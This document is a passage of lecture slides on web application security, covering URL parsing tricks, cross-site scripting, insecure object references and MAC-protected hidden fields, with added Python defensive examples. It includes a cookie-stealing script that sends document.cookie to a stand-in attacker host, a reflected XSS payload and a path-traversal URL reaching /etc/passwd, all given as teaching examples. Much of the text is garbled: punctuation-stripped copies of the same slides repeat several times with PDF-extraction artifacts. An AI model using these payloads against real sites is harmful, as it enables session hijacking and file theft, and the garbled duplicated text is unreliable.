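    """Map a submitted reference back to the real object. Anything that was not
    issued to THIS session (another user's account number, a raw path such as
    /etc/passwd, an index that was never handed out) comes back as None."""
    return session.refs.get(kind, {}).get(ref)


if __name__ == "__main__":
    s = Session()                                   # constructed sample session
    print(account_options(s, ["12345678901", "12346543210"]))
    print(resolve(s, "account", "2"))               # 12346543210
    print(resolve(s, "account", "12346543210"))     # None: raw numbers are not references
    issue_refs(s, "file", ["release/Userman.html"])
    print(resolve(s, "file", "1"))                  # release/Userman.html
    print(resolve(s, "file", "/etc/passwd"))        # None
```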

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.

<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText">
...
</textarea>
</form>

Solution: add a MAC constructed with a server-side secret key

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
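The MAC-protected hidden field above, as an added example (not code from the lecture). The field names pagename and pagemac are from the slide; the key handling, the length-prefixed message and the binding to the session id (which stops a valid pagename/pagemac pair being replayed from another user's form) are assumptions.

```python
"""HMAC-protected hidden form field with session binding (added example)."""
import hashlib
import hmac
import html
import secrets

# In practice loaded from server configuration; never sent to any client.
SERVER_KEY = secrets.token_bytes(32)


def page_mac(pagename: str, session_id: str, key: bytes = SERVER_KEY) -> str:
    """HMAC-SHA256 over pagename AND session id. Each part is length-prefixed
    so that ('ab', 'c') and ('a', 'bc') cannot produce the same message."""
    parts = (pagename.encode("utf-8"), session_id.encode("utf-8"))
    msg = b"".join(len(p).to_bytes(4, "big") + p for p in parts)
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename: str, session_id: str, key: bytes = SERVER_KEY) -> str:
    """Emit the two hidden inputs; pagename is HTML-encoded for the attribute."""
    return (
        f'<input type="hidden" name="pagename" value="{html.escape(pagename, quote=True)}">\n'
        f'<input type="hidden" name="pagemac" value="{page_mac(pagename, session_id, key)}">'
    )


def verify_page(pagename: str, pagemac: str, session_id: str,
                key: bytes = SERVER_KEY) -> bool:
    """Recompute the MAC for the submitted pagename in this session and compare
    in constant time; any tampering with pagename or a swapped session fails."""
    expected = page_mac(pagename, session_id, key).encode("ascii")
    return hmac.compare_digest(expected, pagemac.encode("utf-8"))


if __name__ == "__main__":
    sid = "sess-123"                                   # constructed session id
    print(hidden_fields("NineteenSixtiesToys", sid))
    mac = page_mac("NineteenSixtiesToys", sid)
    print(verify_page("NineteenSixtiesToys", mac, sid))   # True
    print(verify_page("AdminSettings", mac, sid))         # False: pagename changed
    print(verify_page("NineteenSixtiesToys", mac, "sess-999"))  # False: other session
```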

Other authorization mistakes

Assuming requests occur in proper order

- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
- only checking authorization on the first step

Authorization by obscurity

- Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs

- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?

XSS

- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts:

- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby. Wiley, 2004.

- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski. No Starch Press, 2012.

as well as the named RFCs.

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 16: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 17: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 18: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version


Overall consequences

Eyeballs can easily be fooled when looking at URLs.

This is bad for ordinary users as well as web app developers.

http://example.com&gibberish=1234@167772161/

http://example.com\@coredump.cx/

http://example.com;.coredump.cx/

Which server is visited by each of these URLs?

Exercise: Try (carefully) visiting these URLs, or others similar. Try asking some non-CS friends whose servers URLs like ‘www.barclaysbanking.com’ go to.

Examples from The Tangled Web.
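The first URL above, parsed the way RFC 3986 says rather than the way an eye reads it. This is an added example, not from the lecture: `target_host` and `naive_check` are assumed helper names, and the second URL is constructed for comparison.

```python
"""Which host does a URL really point at?  The authority is the text between
'//' and the next '/', and only what follows the last '@' is the host; the
rest is user:password and never reaches DNS.  A bare decimal number is a
legal IPv4 literal (167772161 == 10 * 2**24 + 1, i.e. 10.0.0.1)."""
import ipaddress
from urllib.parse import urlsplit


def target_host(url: str) -> str:
    """Return the host a standards-conforming client would connect to,
    with a decimal IPv4 literal normalised to dotted form."""
    host = urlsplit(url).hostname or ""
    if host.isdigit():
        host = str(ipaddress.IPv4Address(int(host)))
    return host


def naive_check(url: str, allowed_host: str) -> bool:
    """What a hurried developer (or a human eye) does: a string-prefix test.
    It accepts the slide's URL even though that URL goes elsewhere."""
    return url.startswith("http://" + allowed_host)


def is_allowed_redirect(url: str, allowed_hosts: set[str]) -> bool:
    """Allowlist check for a redirect/return-to parameter: compare the parsed,
    normalised host, never a prefix of the raw string."""
    return target_host(url) in allowed_hosts


if __name__ == "__main__":
    # First URL is the slide's (from The Tangled Web); second is constructed.
    for url in ("http://example.com&gibberish=1234@167772161/",
                "http://example.com/login"):
        print(f"{url:48} host={target_host(url):12} "
              f"naive={naive_check(url, 'example.com')} "
              f"parsed={is_allowed_redirect(url, {'example.com'})}")
```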

Outline

Overview
Essential Basics: URLs
Output Filtering and XSS
Object references
Summary

Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS

XSS attacks in general

- Attack typically on (another) user of the web app
- Attacker tricks app into displaying malicious code
  - typically script code

Many possible aims:

- display random images, popup windows
- change page contents, e.g. alter bank account number
- session hijacking: steal session cookies

Session hijacking with XSS

[Picture from Innocent Code]

Example injected script:

    <script>
    document.location.replace("http://www.badguy.example/steal.php"
                              + "?what=" + document.cookie)
    </script>

- redirects victim’s browser to attacker's site, passing cookie
- might also pass currently visited web page
- then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when injected malicious code isn’t stored in the server but is immediately displayed in the visited page. Suppose

    http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

    <h1>Man GCC</h1>

An attacker could use this with a malicious input

    title=<script></script>&program=gcc

which e.g. steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing: tricky, need to understand data flow through app, quoting, encoding, passed to/from functions, databases, etc. Hence: output filtering.

Plain output: HTML encoding

- Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt;, etc.)

Marked up output: complex filtering

- Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

- A better approach: use a dedicated syntax, convert to restricted subset of HTML.
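Plain-output HTML encoding applied to the manpage.php example above. This is an added example, not the lecture's code: `render_unsafe` mirrors the bug (title embedded directly) and `render_safe` encodes every untrusted value for the context it lands in; both function names are assumed.

```python
"""Output encoding for the reflected-XSS example: the same page rendered
twice, once embedding the query-string values directly (the bug) and once
encoding each value on output.  Two contexts are shown, because the encoding
depends on where the value lands: HTML text, and a URL inside a quoted
attribute (URL-encode first, then HTML-encode the result)."""
import html
from urllib.parse import quote_plus


def render_unsafe(title: str, program: str) -> str:
    """The slide's bug: untrusted values go straight into the markup."""
    return (f"<h1>{title}</h1>\n"
            f'<a href="manpage.php?program={program}">{program}</a>')


def render_safe(title: str, program: str) -> str:
    """html.escape turns < > & " ' into entities, so a value can neither open
    a tag in text content nor close the quoted attribute it sits in."""
    href = "manpage.php?program=" + html.escape(quote_plus(program))
    return (f"<h1>{html.escape(title)}</h1>\n"
            f'<a href="{href}">{html.escape(program)}</a>')


if __name__ == "__main__":
    # Constructed inputs: the slide's honest request, then its malicious one.
    for title, program in (("Man GCC", "gcc"), ("<script></script>", "gcc")):
        print("unsafe:", render_unsafe(title, program))
        print("safe:  ", render_safe(title, program))
```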

Outline

Overview
Essential Basics: URLs
Output Filtering and XSS
Object references
Summary

Embarrassing PHP blunders

    http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A “cool” PHP script, showhtml.php:

- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

    http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd

- remote users can visit any file on the system
- mistake motivates defence-in-depth:
  - http server should not serve up any file
  - use internal web server config (separate apps)
  - and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

- the app developer (implicitly) authorized users to read documentation files he had created
- project was open source, no need for logins
- app contained no paths to files outside the project
- so no explicit authorization code was written

- but PHP code didn’t check the filename returned
- showhtml.php provided access to server objects
- input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone’s bank account

    <form action="show-account.asp" method="get">
    Account to display:
    <select name="account">
      <option value="12345678901">12345678901</option>
      <option value="12346543210">12346543210</option>
    </select>
    <input type="submit" name="show" value="Show Account">
    </form>

Example from Innocent Code, based on a Norwegian newspaper story about a “17-year geek able to view anyone’s bank account”.

Solutions for object referencing

Re-validate:

- Check authorization again
- Obvious solution, but duplicates effort

Add a data indirection:

- Session-specific server side array of account nos:

    <option value="1">12345678901</option>
    <option value="2">12346543210</option>

- Similarly for file access:

    http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

for many files a hash table or database could be used.
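The data indirection above, worked through for both the account list and the documentation files. This is an added example, not the lecture's code: `Session`, `account_options`, `show_account`, `doc_options` and `DOC_ROOT` are assumed names, and the document root path is constructed.

```python
"""Indirect object references: the client only ever sees small per-session
handles ("1", "2", ...) that the server built from objects this user is
authorised for.  Resolving a handle is the only way back to a real account
number or file path, so a guessed real identifier, or a handle copied from
another user's session, is rejected rather than silently served."""
from dataclasses import dataclass, field
from pathlib import PurePosixPath

# Constructed for the example: only files under this root are ever exposed.
DOC_ROOT = PurePosixPath("/srv/project/release")


@dataclass
class Session:
    user: str
    refs: dict[str, object] = field(default_factory=dict)  # handle -> object

    def add(self, obj: object) -> str:
        """Register an object the user may access; return its handle.
        Sequential handles are fine because the table is per session
        (random tokens would also work, and hide the count)."""
        handle = str(len(self.refs) + 1)
        self.refs[handle] = obj
        return handle

    def resolve(self, handle: str) -> object:
        try:
            return self.refs[handle]
        except KeyError:
            raise PermissionError(f"unknown reference {handle!r}") from None


def account_options(session: Session, accounts: list[str]) -> str:
    """Render the slide's <option> list with indirect values."""
    return "\n".join(f'<option value="{session.add(a)}">{a}</option>'
                     for a in accounts)


def show_account(session: Session, handle: str) -> str:
    """Handler for show-account?account=<handle>."""
    return str(session.resolve(handle))


def doc_options(session: Session, files: list[str]) -> dict[str, str]:
    """showhtml.php analogue: handle -> path, all paths under DOC_ROOT."""
    return {session.add(DOC_ROOT / f): str(DOC_ROOT / f) for f in files}


def serve_doc(session: Session, handle: str) -> str:
    """Handler for showhtml.php?file=<handle>: returns the resolved path."""
    return str(session.resolve(handle))


if __name__ == "__main__":
    alice = Session("alice")
    print(account_options(alice, ["12345678901", "12346543210"]))
    print(show_account(alice, "2"))
    try:
        show_account(alice, "12345678901")   # real number, not a handle
    except PermissionError as e:
        print("rejected:", e)
```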

Passing too much information

Old flaw: passing unnecessary information to client and expecting it back unmodified.

    <form action="cgi-bin/cgimail.exe" method="post">
    <input type="hidden" name="$File$" value="templates/feedback.txt">
    <input type="hidden" name="$To$" value="feedback@somesite.example">
    </form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

    <form>
    <input type="hidden" name="pagename" value="NineteenSixtiesToys">
    <textarea cols="80" rows="25" name="wpText"></textarea>
    </form>

Solution: add a MAC constructed with a server-side secret key:

    <input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
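The MAC solution above, implemented end to end. This is an added example, not the lecture's code: it uses HMAC-SHA256 rather than whatever produced the slide's value, additionally binds the MAC to the session so a tag cannot be replayed by another user, and `page_mac`, `hidden_fields`, `verify_submission` and `SERVER_KEY` are assumed names (the key is generated for the example).

```python
"""MAC-protected hidden form fields.  On the way out the server emits
pagename plus an HMAC over (session id, pagename) under a key the client
never sees; on the way back it recomputes the tag and compares in constant
time.  A client that edits pagename, or pastes a tag captured in another
session, is rejected before any wiki page is touched."""
import hashlib
import hmac
import html
import secrets

# Constructed for the example; a deployment loads this from config or a KMS.
SERVER_KEY = secrets.token_bytes(32)


def page_mac(pagename: str, session_id: str, key: bytes = SERVER_KEY) -> str:
    # Length-prefix the fields so ("ab", "c") and ("a", "bc") never collide.
    msg = b"".join(len(p).to_bytes(4, "big") + p
                   for p in (session_id.encode(), pagename.encode()))
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename: str, session_id: str) -> str:
    """The two hidden inputs from the slide, values HTML-encoded on output."""
    return (f'<input type="hidden" name="pagename" '
            f'value="{html.escape(pagename, quote=True)}">\n'
            f'<input type="hidden" name="pagemac" '
            f'value="{page_mac(pagename, session_id)}">')


def verify_submission(form: dict[str, str], session_id: str) -> str:
    """Return the trusted pagename or raise ValueError.  compare_digest keeps
    the comparison time independent of how many leading bytes match."""
    pagename = form.get("pagename", "")
    expected = page_mac(pagename, session_id)
    if not hmac.compare_digest(expected, form.get("pagemac", "")):
        raise ValueError("pagename or pagemac was modified in transit")
    return pagename


if __name__ == "__main__":
    sid = "session-1234"  # constructed session identifier
    print(hidden_fields("NineteenSixtiesToys", sid))
    tag = page_mac("NineteenSixtiesToys", sid)
    print(verify_submission({"pagename": "NineteenSixtiesToys", "pagemac": tag}, sid))
    try:
        verify_submission({"pagename": "AdminSettings", "pagemac": tag}, sid)
    except ValueError as e:
        print("rejected:", e)
```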

Other authorization mistakes

Assuming requests occur in proper order:

- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
- only checking authorization on the first step

Authorization by obscurity:

- Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it:

    http://www.myserver.com/secretarea/privatepaper.pdf

Outline

Overview
Essential Basics: URLs
Output Filtering and XSS
Object references
Summary

Review questions

URLs

- Recap the 8 components of a URL. From a server side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?

XSS

- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts:

- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby. Wiley, 2004.
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski. No Starch Press, 2012.

as well as the named RFCs.


Example injected script

<script>
document.location.replace("http://www.badguy.example/steal.php"
                          + "?what=" + document.cookie)
</script>

É redirects the victim's browser to the attacker's site, passing the cookie
É might also pass the currently visited web page
É then the attacker's server can issue a redirect back again
É does not reach cookies flagged HttpOnly, which document.cookie cannot read; injected script can still make requests that carry them

Reflected XSS

